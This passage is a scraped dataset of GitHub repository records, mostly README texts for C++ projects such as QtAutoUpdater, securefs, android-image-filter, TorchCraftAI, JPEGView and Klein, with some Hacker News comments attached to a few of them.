It creates a new updater instance that is connected to the maintenancetool located at \"C:/Qt/MaintenanceTool\". As soon as the application starts, it will check for updates and print the update result. If updates are available, their details will be printed and the maintenancetool is scheduled to start on exit. In both cases, the application will quit afterwards.\n\n```cpp\n#include \n#include \n#include \n\nint main(int argc, char *argv[])\n{\n\tQCoreApplication a{argc, argv};\n\t//create the updater with the application as parent -> will live long enough start the tool on exit\n\tauto updater = new QtAutoUpdater::Updater::create(\"qtifw\", {\n\t\t{\"path\", \"C:/Qt/MaintenanceTool\"} //.exe or .app is automatically added on the platform\n\t}, &a);\n\n\tQObject::connect(updater, &QtAutoUpdater::Updater::checkUpdatesDone, [updater](QtAutoUpdater::Updater::State state) {\n\t\tqDebug() << \"Update result:\" << state;\n\t\tif (state == QtAutoUpdater::Updater::State::NewUpdates) {\n\t\t\t//As soon as the application quits, the maintenancetool will be started in update mode\n\t\t\tqDebug() << \"Update info:\" << updater->updateInfo();\n\t\t\tupdater->runUpdater();\n\t\t}\n\t\t//Quit the application\n\t\tqApp->quit();\n\t});\n\n\t//start the update check\n\tupdater->checkForUpdates();\n\treturn a.exec();\n}\n```\n\n#### UpdateController (QtWidgets)\nThis example will show you the full dialog flow of the update controller, which is used by the widgets library to control the update GUI flow. Since there is no mainwindow in this example, you will only see the controller dialogs. Please note that you can control how much of that dialogset will be shown to the user. This example is *reduced*! for a full example with all parts of the controller, check the `examples/autoupdatergui/WidgetsUpdater` application.\n\n```cpp\n#include \n#include \n\nint main(int argc, char *argv[])\n{\n\tQApplication a{argc, argv};\n\t//Since there is no mainwindow, the various dialogs should not quit the app\n\tQApplication::setQuitOnLastWindowClosed(false);\n\t//first create an updater as usual\n\tauto updater = new QtAutoUpdater::Updater::create(...);\n\t//then create the update controller with the application as parent -> will live long enough start the tool on exit\n\t//since there is no parent window, all dialogs will be top-level windows\n\tauto controller = new QtAutoUpdater::UpdateController{updater, &a};\n\t//start the update check -> AskLevel to give the user maximum control\n\tcontroller->start(QtAutoUpdater::UpdateController::DisplayLevel::Ask);\n\treturn a.exec();\n}\n```\n\n#### Quick GUI\nUnlike the widgets variant, in quick you simply place all the components you want to be shown and attach the to an updater. The flow is created automatically, since all the components know when to show up. It was designed differently, as QML follows a declarative approach. The following shows a basic QML based GUI using simple dialogs. This example is *reduced*! for a full example with all parts of the controller, check the `examples/autoupdaterquick/QuickUpdater` application.\n\n```qml\nimport de.skycoder42.QtAutoUpdater.Core 3.0\nimport de.skycoder42.QtAutoUpdater.Quick 3.0\n\nApplicationWindow {\n\tvisible: true\n\twidth: 360\n\theight: 600\n\ttitle: qsTr(\"Hello World\")\n\n\t// Create the updater, just as you would in cpp\n\tproperty Updater globalUpdater: QtAutoUpdater.createUpdater(...)\n\n\t// the button to start the update check\n\tUpdateButton {\n\t\tanchors.centerIn: parent\n\t\tupdater: globalUpdater\n\t}\n\n\t// dialog to show the check progress\n\tProgressDialog {\n\t\tupdater: globalUpdater\n\t}\n\n\t// dialog to show the update result\n\tUpdateResultDialog {\n\t\tupdater: globalUpdater\n\t\tautoRunUpdater: true\n\t}\n}\n```\n\n## Documentation\nThe documentation is available on [github pages](https://skycoder42.github.io/QtAutoUpdater/). It was created using [doxygen](http://www.doxygen.org/). The HTML-documentation and Qt-Help files are shipped together with the module for both the custom repository and the package on the release page. Please note that doxygen docs do not perfectly integrate with QtCreator/QtAssistant.\n\n## Translations\nThe core library does not need any translation, because it won't show anything to the user. The Gui library however does. The project is prepared for translation. Only a few translations are provided. However, you can easily create the translations yourself. The file `src/translations/qtautoupdater_template.ts` is a ready-made TS file. Just rename it (e.g. to `qtautoupdater_jp.ts`) and open it with the QtLinguist to create the translations.\n\n### Contributed translations:\n- French by [@aalex420](https://github.com/aalex420)\n- Spanish by [@checor](https://github.com/checor)\n- Arabic by [@abdullah-radwan](https://github.com/abdullah-radwan)\n\n## Icon sources/Links\n- [FatCow Free Icons](https://www.fatcow.com/free-icons)\n- [Icons - Material Design](https://material.io/resources/icons/?style=outline)\n- [IconArchive](http://www.iconarchive.com/)\n- http://www.ajaxload.info/\n\n### Test Project\n - http://www.oxygen-icons.org/\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "netheril96/securefs", "link": "https://github.com/netheril96/securefs", "tags": ["filesystem", "cloud", "cryptography", "crypto", "fuse", "fuse-filesystem", "authentication", "encryption", "filesystems", "security"], "stars": 644, "description": "Filesystem in userspace (FUSE) with transparent authenticated encryption", "lang": "C++", "repo_lang": "", "readme": "# securefs\n\n`securefs` is a filesystem in userspace (FUSE) with transparent encryption (when writing) and decryption (when reading).\n\n`securefs` mounts a regular directory onto a mount point. The mount point appears as a regular filesystem, where one can read/write/create files, directories and symbolic links. The underlying directory will be automatically updated to contain the encrypted and authenticated contents.\n\n## Motivation\n\nFrom sensitive financial records to personal diaries and collection of guilty pleasures, we all have something to keep private from prying eyes. Especially when we store our files in the cloud, the company and the NSA may well get their hands upon it. The best protection we can afford ourselves is **cryptography**, the discipline developed by mathematicians and military originally to keep the national secrets.\n\nSecurity, however, is often at odds with convenience, and people easily grow tired of the hassle and revert to no protection at all. Consider the case of protecting our files either locally or in the cloud: we have to encrypt the files before committing to the cloud and decrypt it every time we need to read and write. Worse still, such actions leave unencrypted traces on our hard drive. If we store data in the cloud, another issue arise: manual encryption and decryption prevent files from being synced efficiently.\n\n`securefs` is intended to make the experience as smooth as possible so that the security and convenience do not conflict. After mounting the virtual filesystem, everything just works™.\n\n## Comparison\n\nThere are already many encrypting filesystem in widespread use. Some notable ones are TrueCrypt, FileVault, BitLocker, eCryptFS, encfs and gocryptfs. `securefs` differs from them in that it is the only one with all of the following features:\n\n- [Authenticated encryption](https://en.wikipedia.org/wiki/Authenticated_encryption) (hence secure against chosen ciphertext attacks)\n- [Probabilistic encryption](https://en.wikipedia.org/wiki/Probabilistic_encryption) (hence provides semantical security)\n- Supported on all major platforms (Mac, Linux, BSDs and Windows)\n- Efficient cloud synchronization (not a single preallocated file as container)\n- (Optional) File size obfuscation by random padding.\n\n## Install\n\n[![Actions Status](https://github.com/netheril96/securefs/workflows/C%2FC%2B%2B%20CI/badge.svg)](https://github.com/netheril96/securefs/actions)\n\n### macOS\n\nInstall with [Homebrew](https://brew.sh). [macFUSE](https://osxfuse.github.io) has to be installed beforehand.\n\n```\nbrew install netheril96/fuse/securefs\n```\n\n### Windows\n\nWindows users can download prebuilt package from the releases section. It depends on [WinFsp](https://github.com/billziss-gh/winfsp/releases) and [VC++ 2017 redistribution package](https://support.microsoft.com/en-us/help/2977003/the-latest-supported-visual-c-downloads).\n\nOn Windows, you should encrypt the pagefile to avoid leaking sensitive data on disk. Run with admin privileges with the command `fsutil behavior set EncryptPagingFile 1` before mounting a volume with `securefs`.\n\n### Linux\n\nLinux users have to build it from source.\n\nFirst `fuse` must be installed.\n\n- On Debian based Linux distro, `sudo apt-get install fuse libfuse-dev build-essential cmake python3`.\n- On RPM based Linux, `sudo yum install fuse fuse-devel python3`.\n\nThen clone the sources by `git clone --recursive`, and execute `linux-build.sh`.\n\n### FreeBSD (unofficial)\n\nInstall using packages (recommended):\n\n```bash\npkg install fusefs-securefs\n```\n\nor ports:\n\n```bash\nmake -C /usr/ports/sysutils/fusefs-securefs install\n```\n\nMake sure you load the fuse kernel module before using securefs:\n\n```bash\nkldload fuse\nsysrc -f /boot/loader.conf fuse_load=\"YES\" # Load fuse automatically at boot\n```\n\n## Basic usage\n\n_It is recommended to disable or encrypt the swap and hibernation file. Otherwise plaintext and keys stored in the main memory may be written to disk by the OS at any time._\n\nExamples:\n\n```bash\nsecurefs --help\nsecurefs create ~/Secret\nsecurefs chpass ~/Secret\nsecurefs mount ~/Secret ~/Mount # press Ctrl-C to unmount\nsecurefs m -h # m is an alias for mount, -h tell you all the flags\n```\n\n## Lite and full mode\n\nThere are two categories of filesystem format.\n\nThe **lite** format simply encrypts filenames and file contents separately, similar to how `encfs` operates, although with more security.\n\nThe **full** format maps files, directory and symlinks in the virtual filesystem all to regular files in the underlying filesystem. The directory structure is flattened and recorded as B-trees in files.\n\nThe lite format has become the default on Unix-like operating systems as it is much faster and features easier conflict resolution, especially when used with DropBox, Google Drive, etc. The full format, however, leaks fewer information about the filesystem hierarchy, runs relatively independent of the features of the underlying filesystem, and is in general more secure.\n\nTo request full format, which is no longer the default, run `securefs create --format 2`.\n\n## Design and algorithms\n\nSee [here](docs/design.md).\n\n## Caveat\n\nIf you store `securefs` encrypted files on iCloud Drive, it might cause Spotlight Search on iOS to stop working. It is a bug in iOS, not in `securefs`.\n\nTo work around that bug, you can disable the indexing of _Files_ app in Settings -> Siri & Suggestions.\n", "readme_type": "markdown", "hn_comments": "This is something I wish I implemented as a hobby project but never found the time to do it. Congrats! I see you implement a directory as a file containing a b-tree. Could you provide more info on this?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Xilinx/Vitis_Libraries", "link": "https://github.com/Xilinx/Vitis_Libraries", "tags": [], "stars": 644, "description": "Vitis Libraries", "lang": "C++", "repo_lang": "", "readme": "# Vitis Accelerated Libraries\n[Vitis™ Unified Software Platform](https://www.xilinx.com/products/design-tools/vitis/vitis-platform.html) includes an extensive set of open-source, performance-optimized libraries that offer out-of-the-box acceleration with minimal to zero-code changes to your existing applications.\n\n[Comprehensive documentation](https://docs.xilinx.com/r/en-US/Vitis_Libraries/index.html)\n\n* Common Vitis accelerated-libraries for Math, Statistics, Linear Algebra, and DSP offer a set of core functionality for a wide range of diverse applications.\n* Domain-specific Vitis accelerated libraries offer out-of-the-box acceleration for workloads like Vision and Image Processing, Quantitative Finance, Database, and Data Analytics, Data Compression and more.\n* Leverage the rich growing ecosystem of partner-accelerated libraries, framework plug-ins, and accelerated applications to hit the ground running and accelerate your path to production.\n\n![Comprehensive Set of Domain-Specific Accelerated Libraries](https://xilinx.github.io/Vitis_Libraries/_images/1569434411715.png)\n\n# Use in Familiar Programming Languages\nUse Vitis accelerated-libraries in commonly-used programming languages that you know like C, C++, and Python. Leverage Xilinx platforms as an enabler in your applications \u2013 Work at an application level and focus your core competencies on solving challenging problems in your domain, accelerate time to insight, and innovate.\n\nWhether you want to accelerate portions of your existing x86 host application code or want to develop accelerators for deployment on Xilinx embedded platforms, calling a Vitis accelerated-library API or Kernel in your code offers the same level of abstraction as any software library.\n\n![Programming Languages](https://xilinx.github.io/Vitis_Libraries/_images/1569434541001.png)\n\n# Scalable and Flexible\n\nVitis accelerated-libraries are accessible to all developers through GitHub and scalable across all Xilinx platforms. Develop your applications using these optimized libraries and seamlessly deploy across Xilinx platforms at the edge, on-premise or in the cloud without having to reimplement your accelerated application.\n\nFor rapid prototyping and quick evaluation of the benefits Xilinx can bring to your applications, you can use them as plug-and-play accelerators, called directly as an API in the user application for several workloads like Computer Vision and Image Processing, Quantitative Finance, Database, and Data Analytics among others.\n\n![Scalable and Flexible](https://xilinx.github.io/Vitis_Libraries/_images/1569434644122.png)\n\nTo design custom accelerators for your application, use Vitis library functions as optimized algorithmic building blocks, modify them to suit your specific needs, or use them as a reference to completely design your own. Choose the flexibility you need!\n\nCombine domain-specific Vitis libraries with pre-optimized deep learning models from the Vitis AI library or the Vitis AI development kit to accelerate your whole application and meet the overall system-level functionality and performance goals.\n\n![Scalable and Flexible Library Functions](https://xilinx.github.io/Vitis_Libraries/_images/1568760747007.png)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ragnraok/android-image-filter", "link": "https://github.com/ragnraok/android-image-filter", "tags": [], "stars": 643, "description": "some android image filters", "lang": "C++", "repo_lang": "", "readme": "android-image-filter\n====================\n\nsome android image filters\n\nin some filter, I use NDK to implement to make it more efficient\n\n# Setup\n\n- Install Android NDK and properly configure it: [http://goo.gl/koTCb](http://goo.gl/koTCb)\n- Get a clean clone of this project, import the library in Android Studio\n- then Clean and Build the hold project to regenerate the library\n- Then just add library module as a dependency to your existing project.\n\n# How to Use it\nIt is dead simple, you can see magic in the following code:\n\n```Java\n Bitmap newBitmap = BitmapFilter.changeStyle(originBitmap, BitmapFilter.BLUR_STYLE);\n imageView.setImageBitmap(newBitmap); \n```\n\nand there are some options for the filter, you can go to see the demo to see how to use this options to customize your filter effect\n\nYou can see all filters in file [BitmapFilter.java][3], currently contains totally 19 kinds of filters now, here is the list of filters and their options(show by code):\n\n* Grayscale\n* Relief\n* Blur(Average Smooth)\n\n\t```Java\n\tBitmapFilter.changeStyle(originBitmap, BitmapFilter.BLUR_STYLE, maskSize);\n\t```\n\t\n``maskSize`` is a integer, to indicate the average blur mask's size\n\t\n* Oil Painting\n* Neon\n\t\n\t```Java\n\tBitmapFilter.changeStyle(originBitmap, BitmapFilter.NEON_STYLE, \n\tneon_color_R, neon_color_G, neon_color_B);\t\n\t```\n\n``neon_color_R``, ``neon_color_G``, ``neon_color_B`` are the R,G,B component are integer\t\n\t\n* Pixelate\n\t\n\t```Java \n\tBitmapFilter.changeStyle(originBitmap, BitmapFilter.PIXELATE_STYLE, pixelSize);\n\t```\n\t\n``pixelSize`` is a integer, the pixel size for this filter\n\t\n* Old TV\n* Invert Color\n* Block\n* Old Photo\n* Sharpen(By Laplacian)\n* Light\n\t\n\t```Java \n\tBitmapFilter.changeStyle(originBitmap, BitmapFilter.LIGHT_STYLE, light_center_x, light_center_y, light_radius);\n\t```\n\t\n``light_center_x``, ``light_center_y`` are integer, indicate the center of the light spot, the origin in the left-upper side, and the ``light_radius`` is indicate the radius of light spot, in pixel\n\n* Lomo\n\t\n\t```Java\n\tBitmapFilter.changeStyle(originBitmap, BitmapFilter.LOMO_STYLE, roundRadius);\n\t```\n\n``roundRadius`` is a double, the black round's radius in the effect\t\n\n* HDR\n* Gaussian Blur\n\n\t```Java\n\tBitmapFilter.changeStyle(originBitmap, BitmapFilter.GAUSSIAN_BLUR_STYLE, sigma);\n\t```\n\t\n\t``sigma`` is a double, the sigma value in Gaussian Blur, the bigger of sigma, the smoother in the result image\n\n* Soft Glow\n\n\t```Java\n\tBitmapFilter.changeStyle(originBitmap, BitmapFilter.SOFT_GLOW_STYLE, sigma);\n\t```\n\t\n\t``sigma`` is a double, the same as ``sigma`` in Gaussian Blur, indicate the sigma value in the process of Gaussian Blur for Soft Glow\n\n* Sketch\n* Motion Blur\n\n\t```Java\n\tBitmapFilter.changeStyle(originBitmap, BitmapFilter.SOFT_GLOW_STYLE, xSpeed, ySpeed);\n\t```\n\t``xSpeed`` and ``ySpeed`` are both integer, indicate the speed in x-axis and y-axis, the origin in the left-upper side\n\n* Gotham\n\nPS: all options have defalut values, so you can just select the effect and pass nothing, like this:\n\n```Java\nBitmapFilter.changeStyle(originBitmap, BitmapFilter.MOTION_BLUR_STYLE);\n```\n\n\nIf you have any question, please open an [issue][4] and show your code and the program ouput, thanks!\n\n ![][2]\n \n# The MIT License (MIT)\n\nCopyright (c) \\<2012-2016\\> \\\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\n[1]: http://1drv.ms/1i10uuX\n[2]: screenshot/img1.png\n[3]: library/src/cn/Ragnarok/BitmapFilter.java\n[4]: https://github.com/ragnraok/android-image-filter/issues?state=open\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "TorchCraft/TorchCraftAI", "link": "https://github.com/TorchCraft/TorchCraftAI", "tags": [], "stars": 643, "description": "A platform that lets you build agents to learn to play StarCraft: Brood War.", "lang": "C++", "repo_lang": "", "readme": "# TorchCraftAI\n\nTorchCraftAI is a platform that lets you build agents to play (and learn to play) *StarCraft\u00ae: Brood War\u00ae*\u2020. TorchCraftAI includes:\n- A modular framework for building StarCraft agents\n- CherryPi, a bot which plays complete games of StarCraft (1st place SSCAIT 2017-18)\n- A reinforcement learning environment with minigames, models, and training loops\n- TorchCraft support for TCP communication with StarCraft and BWAPI\n- Support for Linux, Windows, and OSX\n\n## Get started\n\nSee guides for:\n\n- [Linux](https://torchcraft.github.io/TorchCraftAI/docs/install-linux.html)\n- [Windows](https://torchcraft.github.io/TorchCraftAI/docs/install-windows.html)\n- [OSX](https://torchcraft.github.io/TorchCraftAI/docs/install-macos.html)\n\n## Documentation\n\n* [Home](https://torchcraft.github.io/TorchCraftAI)\n* [Architecture overview](https://torchcraft.github.io/TorchCraftAI/docs/architecture.html)\n* [Code reference](https://torchcraft.github.io/TorchCraftAI/reference/)\n\n### Tutorials\n\n* [Train a model to place buildings](https://torchcraft.github.io/TorchCraftAI/docs/bptut-intro.html)\n* [Train a model to fight](https://torchcraft.github.io/TorchCraftAI/docs/microtut-intro.html)\n\n## Licensing\n\nWe encourage you to experiment with TorchCraftAI! See [LICENSE](https://github.com/TorchCraft/TorchCraftAI/blob/master/LICENSE), plus more on [contributing](https://github.com/TorchCraft/TorchCraftAI/blob/master/CONTRIBUTING.md) and our [code of conduct](https://github.com/TorchCraft/TorchCraftAI/blob/master/CODE_OF_CONDUCT.md).\n\n\u2020: StarCraft is a trademark or registered trademark of Blizzard Entertainment, Inc., in the U.S. and/or other countries. Nothing in this repository should be construed as approval, endorsement, or sponsorship by Blizzard Entertainment, Inc.\n", "readme_type": "markdown", "hn_comments": "Does anyone know if this is headless or if it needs to render the game elements? Can I inject macros with this? That is, can I be playing a game, cue the AI to do some micro for me then let me keep playing? I assume there are other tools to do this but I would think they would interact with my mouse cursor rather than the BWAPI.Brood War AI may end up being a significantly easier problem (with this formulation) than DeepMind's StarCraft II research environment for several reasons:+ As others have mentioned: Brood War is significantly cheaper to run (can be headless, runs well on ancient CPU), making it more amenable to the self-play with massive numbers of games approach+ Brood War benefits significantly (arguably more than SC2) from skilled micromanagement, which is arguably easier to exploit as it doesn't require long-term/high level planning (but requires a generous actions per minute cap)+ This API doesn't require the AI to also do simple computer vision/recognition of the game (vs. DeepMind's simplified graphical representation)+ This API interfaces with game actions directly (BWAPI) vs. mouse/keyboard level actionsIt'll be interesting to see which problem (Brood War vs. StarCraft II) gets solved to a compelling degree with learning first.Are there any resulting data we can look at? Did anybody find wrote about actually running this for a while and seeing anything cool emerge?Am I going to start getting targeted ads based on my build order and actions per minute?I would love to see games with life long learning. It learns to beat u then and you have to learn to beat it to continue the game.Side question, is there any free games you can develop ai strategy/tactics for, having an active community? Maybe designed exactly for that kind of purpose? The platform and license issues with Starcraft are just too much of a barrier.The timing of this project is a bit unfortunate since Blizzard and DeepMind announced a month ago that they would be releasing an API to use StarCraft 2 for AI research:https://deepmind.com/blog/deepmind-and-blizzard-release-star...Plus: StarCraft 2 has a free edition (not enough people know this), so you will most likely be able to use SC2 for research without needing to buy a licence.\"We present TorchCraft, a library that enables deep learning research on Real-Time Strategy (RTS) games such as StarCraft: Brood War, by making it easier to control these games from a machine learning framework, here Torch. This white paper argues for using RTS games as a benchmark for AI research, and describes the design and components of TorchCraft.\" Via link in the READMEhttps://arxiv.org/abs/1611.00625", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "opensource-apple/dyld", "link": "https://github.com/opensource-apple/dyld", "tags": [], "stars": 643, "description": null, "lang": "C++", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sylikc/jpegview", "link": "https://github.com/sylikc/jpegview", "tags": ["image-viewer", "image-processing"], "stars": 643, "description": "Fork of JPEGView by David Kleiner - fast and highly configurable viewer/editor for JPEG, BMP, PNG, WEBP, TGA, GIF and TIFF images with a minimal GUI. Basic on-the-fly image processing is provided - allowing adjusting typical parameters as sharpness, color balance, rotation, perspective, contrast and local under-/overexposure.", "lang": "C++", "repo_lang": "", "readme": "[![Documentation](https://img.shields.io/badge/Docs-Outdated-yellowgreen)](https://htmlpreview.github.io/?https://github.com/sylikc/jpegview/blob/master/src/JPEGView/Config/readme.html) [![Localization Progress](https://img.shields.io/badge/Localized-82%25-blueviolet)](https://github.com/sylikc/jpegview/wiki/Localization) [![Build x64](https://github.com/sylikc/jpegview/actions/workflows/build-release-x64.yml/badge.svg?branch=master)](https://github.com/sylikc/jpegview/actions/workflows/build-release-x64.yml) [![OS Support](https://img.shields.io/badge/Windows-XP%20%7C%207%20%7C%208%20%7C%2010%20%7C%2011-blue)](#) [![License: GPL v2](https://img.shields.io/badge/License-GPL%20v2-blue)](https://github.com/sylikc/jpegview/blob/master/LICENSE.txt)\n\n[![Latest GitHub Release](https://img.shields.io/github/v/release/sylikc/jpegview?label=GitHub&style=social)](https://github.com/sylikc/jpegview/releases)[![Downloads](https://badgen.net/github/assets-dl/sylikc/jpegview?cache=3600&color=grey&label=)](#) [![WinGet](https://img.shields.io/badge/WinGet-Current-green)](https://winstall.app/apps/sylikc.JPEGView) [![PortableApps](https://img.shields.io/badge/PortableApps-Current-green)](https://portableapps.com/apps/graphics_pictures/jpegview_portable) [![Chocolatey](https://img.shields.io/chocolatey/v/jpegview)](https://community.chocolatey.org/packages/jpegview)\n\n# JPEGView - Image Viewer and Editor\n\nThis is the official re-release of JPEGView.\n\n## Description\n\nJPEGView is a lean, fast and highly configurable image viewer/editor with a minimal GUI.\n\n### Formats Supported\n\nJPEGView has built-in support the following formats:\n\n* Popular: JPEG, GIF\n* Lossless: BMP, PNG, TIFF\n* Web: WEBP, JXL, HEIF/HEIC, AVIF\n* Legacy: TGA, WDP, HDP, JXR\n* Camera RAW formats:\n * Adobe (DNG), Canon (CRW, CR2), Nikon (NEF, NRW), Sony (ARW, SR2)\n * Olympus (ORF), Panasonic (RW2), Fujifilm (RAF)\n * Sigma (X3F), Pentax (PEF), Minolta (MRW), Kodak (KDC, DCR)\n\nMany additional formats are supported by Windows Imaging Component (WIC)\n\n### Basic Image Editor\n\nBasic on-the-fly image processing is provided - allowing adjusting typical parameters:\n\n* sharpness\n* color balance\n* rotation\n* perspective\n* contrast\n* local under-/over-exposure\n\n### Other Features:\n\n* Small and fast, uses SSE2 and up to 4 CPU cores\n* High quality resampling filter, preserving sharpness of images\n* Basic image processing tools can be applied realtime during viewing\n* Movie/Slideshow mode - to play folder of JPEGs as movie\n\n# Installation\n\n## Official Releases\n\nOfficial releases will be made to [sylikc's GitHub Releases](https://github.com/sylikc/jpegview/releases) page. Each release includes:\n\n* **Archive Zip/7z** - Portable\n* **Windows Installer MSI** - For Installs\n* **Source code** - Build it yourself\n\n## Portable\n\nJPEGView _does not require installation_ to run. Just **unzip, and run** either the 64-bit version, or the 32-bit version depending on which platform you're on. It can save the settings to the extracted folder and run entirely portable.\n\n## MSI Installer\n\nFor those who prefer to have JPEGView installed for All Users, a 32-bit/64-bit installer is available to download starting with v1.0.40. (Unfortunately, I don't own a code signing certificate yet, so the MSI release is not signed. Please verify checksums!)\n\n### WinGet\n\nIf you're on Windows 11, or Windows 10 (build 1709 or later), you can also download it directly from the official [Microsoft WinGet tool](https://docs.microsoft.com/en-us/windows/package-manager/winget/) repository. This downloads the latest MSI installer directly from GitHub for installation.\n\nExample Usage:\n\nC:\\> `winget search jpegview`\n```\nName Id Version Source\n-----------------------------------------\nJPEGView sylikc.JPEGView 1.0.39.1 winget\n```\n\nC:\\> `winget install jpegview`\n```\nFound JPEGView [sylikc.JPEGView] Version 1.0.39.1\nThis application is licensed to you by its owner.\nMicrosoft is not responsible for, nor does it grant any licenses to, third-party packages.\nDownloading https://github.com/sylikc/jpegview/releases/download/v1.0.39.1-wix/JPEGView64_en-us_1.0.39.1.msi\n ============================== 2.13 MB / 2.13 MB\nSuccessfully verified installer hash\nStarting package install...\nSuccessfully installed\n```\n\n## PortableApps\n\nAnother option is to use the official [JPEGView on PortableApps](https://portableapps.com/apps/graphics_pictures/jpegview_portable) package. The PortableApps launcher preserves user settings in a separate directory from the extracted application directory. This release is signed.\n\n## System Requirements\n\n* 32-bit version: Windows 7 or later\n * A special _32-bit Windows XP SP2_ build is available, which supports most formats (except for formats added after v1.0.37.1, ex. Animated PNG, JXL, HEIC). Other features and options are the same as the normal builds.\n\n* 64-bit version: Windows 7/8/10/11 64-bit or later\n\n\n## What's New\n\n* See what has changed in the [latest releases](https://github.com/sylikc/jpegview/releases)\n* Or Check the [CHANGELOG.txt](https://github.com/sylikc/jpegview/blob/master/CHANGELOG.txt) to review new features in detail.\n\n# Help / Documentation\n\nThe JPEGView documentation is a little out of the date at the moment, but should still give a good summary of the features.\n\nThis [readme.html](https://htmlpreview.github.io/?https://github.com/sylikc/jpegview/blob/master/src/JPEGView/Config/readme.html) is part of the JPEGView package.\n\n\n# Brief History\n\nThis GitHub repo continues the legacy (is a \"fork\") of the excellent project [JPEGView by David Kleiner](https://sourceforge.net/projects/jpegview/). Unfortunately, starting in 2020, the SourceForge project has essentially been abandoned, with the last update being [2018-02-24 (1.0.37)](https://sourceforge.net/projects/jpegview/files/jpegview/). It's an excellent lightweight image viewer that I use almost daily!\n\nThe starting point for this repo was a direct clone from SourceForge SVN to GitHub Git. By continuing this way, it retains all previous commits and all original author comments. \n\nI'm hoping with this project, some devs might help me keep the project alive! It's been awhile, and could use some new features or updates. Looking forward to the community making suggestions, and devs will help with some do pull requests as some of the image code is quite a learning curve for me to pick it up. -sylikc\n\n## Special Thanks\n\nSpecial thanks to [qbnu](https://github.com/qbnu) for adding additional codec support!\n* Animated WebP\n* Animated PNG\n* JPEG XL with animation support\n* HEIF/HEIC/AVIF support\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jeremyong/klein", "link": "https://github.com/jeremyong/klein", "tags": ["dual-quaternions", "pga", "sse", "geometric-algebra", "projective-geometry", "3d", "3d-graphics", "animation", "inverse-kinematics", "algebra", "quaternions", "quaternion-algebra", "simd"], "stars": 644, "description": "P(R*_{3, 0, 1}) specialized SIMD Geometric Algebra Library", "lang": "C++", "repo_lang": "", "readme": "# [Klein](https://jeremyong.com/klein)\r\n\r\n[![License: MIT](https://img.shields.io/badge/License-MIT-blueviolet.svg)](https://opensource.org/licenses/MIT)\r\n[![DOI](https://zenodo.org/badge/236777729.svg)](https://zenodo.org/badge/latestdoi/236777729)\r\n\r\n[![Build Status](https://travis-ci.org/jeremyong/klein.svg?branch=master)](https://travis-ci.org/jeremyong/klein)\r\n[![Build Status](https://ci.appveyor.com/api/projects/status/w3ug2ad08jyved8o?svg=true)](https://ci.appveyor.com/project/jeremyong/klein)\r\n[![Coverity Status](https://img.shields.io/coverity/scan/20402.svg)](https://scan.coverity.com/projects/jeremyong-klein)\r\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/5908bd446f3d4bb0bb1fd2e0808cb8a1)](https://www.codacy.com/manual/jeremyong/klein?utm_source=github.com&utm_medium=referral&utm_content=jeremyong/klein&utm_campaign=Badge_Grade)\r\n\r\n\ud83d\udc49\ud83d\udc49 [Project Site](https://jeremyong.com/klein) \ud83d\udc48\ud83d\udc48\r\n\r\n## Description\r\n\r\nDo you need to do any of the following? Quickly? _Really_ quickly even?\r\n\r\n- Projecting points onto lines, lines to planes, points to planes?\r\n- Measuring distances and angles between points, lines, and planes?\r\n- Rotate or translate points, lines, and planes?\r\n- Perform smooth rigid body transforms? Interpolate them smoothly?\r\n- Construct lines from points? Planes from points? Planes from a line and a point?\r\n- Intersect planes to form lines? Intersect a planes and lines to form points?\r\n\r\nIf so, then Klein is the library for you!\r\n\r\nKlein is an implementation of `P(R*_{3, 0, 1})`, aka 3D Projective Geometric Algebra.\r\nIt is designed for applications that demand high-throughput (animation libraries,\r\nkinematic solvers, etc). In contrast to other GA libraries, Klein does not attempt to\r\ngeneralize the metric or dimensionality of the space. In exchange for this loss of generality,\r\nKlein implements the algebraic operations using the full weight of SSE (Streaming\r\nSIMD Extensions) for maximum throughput.\r\n\r\n## Requirements\r\n\r\n- Machine with a processor that supports SSE3 or later (Steam hardware survey reports 100% market penetration)\r\n- C++11/14/17 compliant compiler (tested with GCC 9.2.1, Clang 9.0.1, and Visual Studio 2019)\r\n- Optional SSE4.1 support\r\n\r\n## Usage\r\n\r\nYou have two options to use Klein in your codebase. First, you can simply copy the contents of the\r\n`public` folder somewhere in your include path. Alternatively, you can include this entire project\r\nin your source tree, and using cmake, `add_subdirectory(Klein)` and link the `klein::klein` interface\r\ntarget.\r\n\r\nIn your code, there is a single header to include via `#include `, at which point\r\nyou can create planes, points, lines, ideal lines, bivectors, motors, directions, and use their\r\noperations. Please refer to the [project site](https://jeremyong.com/klein) for the most up-to-date\r\ndocumentation.\r\n\r\n## Motivation\r\n\r\nPGA fully streamlines traditionally used quaternions, and dual-quaternions in a single algebra.\r\nNormally, the onus is on the user to perform appropriate casts and ensure signs and memory layout\r\nare accounted for. Here, all types are unified within the geometric algebra,\r\nand operations such as applying quaternion or 